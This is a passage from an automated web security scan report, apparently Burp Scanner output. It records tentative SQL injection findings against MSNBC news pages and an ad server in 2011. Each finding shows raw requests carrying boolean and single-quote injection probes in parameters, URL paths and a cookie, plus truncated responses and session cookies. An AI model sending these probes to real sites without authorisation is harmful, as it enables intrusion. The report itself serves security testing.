<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=618466099&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&amp;from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers &amp; Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li>
                   <li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li>
                   <li class="i15"><a href="h
...[SNIP]...

1.92. http://technolog.msnbc.redacted/xbox [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://technolog.msnbc.redacted
Path:   /xbox

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /xbox?1'%20and%201%3d1--%20=1 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:04:46 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 149332

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=670090030&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;56:27:108;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=670090030&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;56:27:108;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&amp;from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers &amp; Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li>
                   <li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li>
                   <li cl
...[SNIP]...

Request 2

GET /xbox?1'%20and%201%3d2--%20=1 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:04:48 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 149342

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=1469299940&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;56:27:108;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=1469299940&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;56:27:108;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&amp;from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers &amp; Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li>
                   <li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li>
                   <li
...[SNIP]...

1.93. http://today.msnbc.redacted/id/41319614/ns/today-entertainment/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://today.msnbc.msn.com
Path:   /id/41319614/ns/today-entertainment/

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /id/41319614'%20and%201%3d1--%20/ns/today-entertainment/ HTTP/1.1
Host: today.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Cache-Control: private, max-age=163
Date: Sun, 30 Jan 2011 03:01:49 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 133103


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
e.","dateline":"LOS ANGELES","components":{"survey":null,"slices":[{"videos":[{"launch":41325432,"plt":1,"plc":0,"settings":34245299,"settingsOverride":0,"typeName":"Video","RenderAuthority":"-1075847500","ItemIndex":0},{"launch":41318699,"plt":1,"plc":0,"settings":34245299,"settingsOverride":25067201,"typeName":"Video","RenderAuthority":"-1075847500","ItemIndex":0},{"launch":41312381,"plt":1,"plc":0,"settings":34245299,"settingsOverride":0,"typeName":"Video","RenderAuthority":"-1075847500","ItemIndex":0},{"launch":41311278,"plt":1,"plc":0,"settings":34245299,"settingsOverride":0,"typeName":"Video","RenderAuthority":"-1075847500","ItemIndex":0}],"typeName":"VideoSlice","RenderAuthority":"-1075847500","ItemIndex":0},{"lazyItems":[],"typeName":"TextSlice","RenderAuthority":"-1075847500","ItemIndex":0},{"interactives":[{"headline":"Charlie Sheen\u0027s ups and downs","caption":"","credits":"TODAYshow.com","label":"Timeline","content":{"flashvars":{"omnitureInstanceName":"SheenTime","dataId":"CharlieSheen_timeline","_w":"1000","_h":"640"},"embedParams":{"width":"1000","height":"640","play":"true","loop":"true","menu":"false","quality":"Best","scale":"showall","salign":"tl","wmode":"opaque","bgcolor":"#FFFFFF","allowfullscreen":"true","allowscriptaccess":"always","allownetworking":"all"},"uri":"http://msnbcmedia.redacted/i/MSNBC/Components/Interactives/_templates/Timeline/timeline_template.swf","width":1000,"height":640,"typeName":"FlashInteractive","RenderAuthority":"-1075847500","ItemIndex":0},"archiveUri":"http://today.msnbc.redacted/id/41320098/ns/today-entertainment/","workbenchId":41320787,"typeName":"Interactive","RenderAuthority":"-1075847500","ItemIndex":0}],"typeName":"InteractiveSlice","RenderAuthority":"-1075847500","ItemIndex":0},{"bridge":[{"workbenchId":35313411,"headline":"Talent and troubles follow Charlie Sheen","totalSlides":32,"firstSlide":{"headline":"WOLVERINES!","caption":"Charlie Sheen, born Carlos Estevez, got his movie start in 1984\u0027s \"Red Dawn.\" His fellow young stars included Patrick Swayze, C. Thomas Howell, Lea Thompson and Jennifer Grey.&#160;(MGM)","src":"http://msnbcmedia4.msn.com/j/MSNBC/Components/Slideshows/_production/ss-10020
...[SNIP]...

Request 2

GET /id/41319614'%20and%201%3d2--%20/ns/today-entertainment/ HTTP/1.1
Host: today.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Cache-Control: private, max-age=180
Date: Sun, 30 Jan 2011 03:01:50 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 133140


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
e.","dateline":"LOS ANGELES","components":{"survey":null,"slices":[{"videos":[{"launch":41325432,"plt":1,"plc":0,"settings":34245299,"settingsOverride":0,"typeName":"Video","RenderAuthority":"-1075847510","ItemIndex":0},{"launch":41318699,"plt":1,"plc":0,"settings":34245299,"settingsOverride":25067201,"typeName":"Video","RenderAuthority":"-1075847510","ItemIndex":0},{"launch":41312381,"plt":1,"plc":0,"settings":34245299,"settingsOverride":0,"typeName":"Video","RenderAuthority":"-1075847510","ItemIndex":0},{"launch":41311278,"plt":1,"plc":0,"settings":34245299,"settingsOverride":0,"typeName":"Video","RenderAuthority":"-1075847510","ItemIndex":0}],"typeName":"VideoSlice","RenderAuthority":"-1075847510","ItemIndex":0},{"lazyItems":[],"typeName":"TextSlice","RenderAuthority":"-1075847510","ItemIndex":0},{"interactives":[{"headline":"Charlie Sheen\u0027s ups and downs","caption":"","credits":"TODAYshow.com","label":"Timeline","content":{"flashvars":{"omnitureInstanceName":"SheenTime","dataId":"CharlieSheen_timeline","_w":"1000","_h":"640"},"embedParams":{"width":"1000","height":"640","play":"true","loop":"true","menu":"false","quality":"Best","scale":"showall","salign":"tl","wmode":"opaque","bgcolor":"#FFFFFF","allowfullscreen":"true","allowscriptaccess":"always","allownetworking":"all"},"uri":"http://msnbcmedia.redacted/i/MSNBC/Components/Interactives/_templates/Timeline/timeline_template.swf","width":1000,"height":640,"typeName":"FlashInteractive","RenderAuthority":"-1075847510","ItemIndex":0},"archiveUri":"http://today.msnbc.redacted/id/41320098/ns/today-entertainment/","workbenchId":41320787,"typeName":"Interactive","RenderAuthority":"-1075847510","ItemIndex":0}],"typeName":"InteractiveSlice","RenderAuthority":"-1075847510","ItemIndex":0},{"bridge":[{"workbenchId":35313411,"headline":"Talent and troubles follow Charlie Sheen","totalSlides":32,"firstSlide":{"headline":"WOLVERINES!","caption":"Charlie Sheen, born Carlos Estevez, got his movie start in 1984\u0027s \"Red Dawn.\" His fellow young stars included Patrick Swayze, C. Thomas Howell, Lea Thompson and Jennifer Grey.&#160;(MGM)","src":"http://msnbcmedia4.msn.com/j/MSNBC/Components/Slideshows/_production/ss-10020
...[SNIP]...

1.94. http://redcated/APM/iview/139941180/direct [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://redcated
Path:   /APM/iview/139941180/direct

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /APM/iview/139941180/direct?1'=1 HTTP/1.1
Host: redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F;

Response 1

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 4790
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 01:51:49 GMT
Connection: close

<!--#WIDTH=728 #HEIGHT=90 #CREATIVETYPEID=4 #DELIVERYMETHODID=2-->
<html>
<head>
<title>HealthyMinerals_728x90_Iframe_Homepage</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQ
...[SNIP]...
<SCR' + 'IPT LANGUAGE=VBScript\>');
document.writeln('on error resume next');
document.writeln('Set oFlashPlayer = CreateObject("ShockwaveFlash.ShockwaveFlash." & nRequiredVersion)');
document.writeln('If IsObject(oFlashPlayer) Then');
document.writeln('bIsRig
...[SNIP]...

Request 2

GET /APM/iview/139941180/direct?1''=1 HTTP/1.1
Host: redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F;

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 199
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 01:51:50 GMT
Connection: close

<script language="JavaScript"
class="adsvelocity_728x90"
src="http://media.adsvelocity.com/ad/24.js?click=http://clk.atdmt.com/go/139941180/direct;ai.198084592.198090580;ct.1/01?href=""></script>

1.95. http://redcated/APM/iview/148848786/direct [;wi.728;hi.90/01?click parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://redcated
Path:   /APM/iview/148848786/direct

Issue detail

The ;wi.728;hi.90/01?click parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ;wi.728;hi.90/01?click parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /APM/iview/148848786/direct;;wi.728;hi.90/01?click=' HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response 1

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 7022
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 17:22:07 GMT

<html><head><title>110109_22_UTV_THDVR_29_100B_NOTAG_728x90</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-wi
...[SNIP]...
<SCR' + 'IPT LANGUAGE=VBScript\>');
document.writeln('on error resume next');
document.writeln('Set oFlashPlayer = CreateObject("ShockwaveFlash.ShockwaveFlash." & nRequiredVersion)');
document.writeln('If IsObject(oFlashPlayer) Then');
document.writeln('bIsRig
...[SNIP]...

Request 2

GET /APM/iview/148848786/direct;;wi.728;hi.90/01?click='' HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 245
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 17:22:08 GMT

<script type="text/javascript">
var CasaleArgs = new Object();
CasaleArgs.version = 2;
CasaleArgs.adUnits = "2";
CasaleArgs.casaleID = 120511;
</script>
<script type="text/javascript" src="http:
...[SNIP]...

1.96. http://redcated/APM/iview/148848786/direct [AA002 cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://redcated
Path:   /APM/iview/148848786/direct

Issue detail

The AA002 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the AA002 cookie, and a general error message was returned. Two single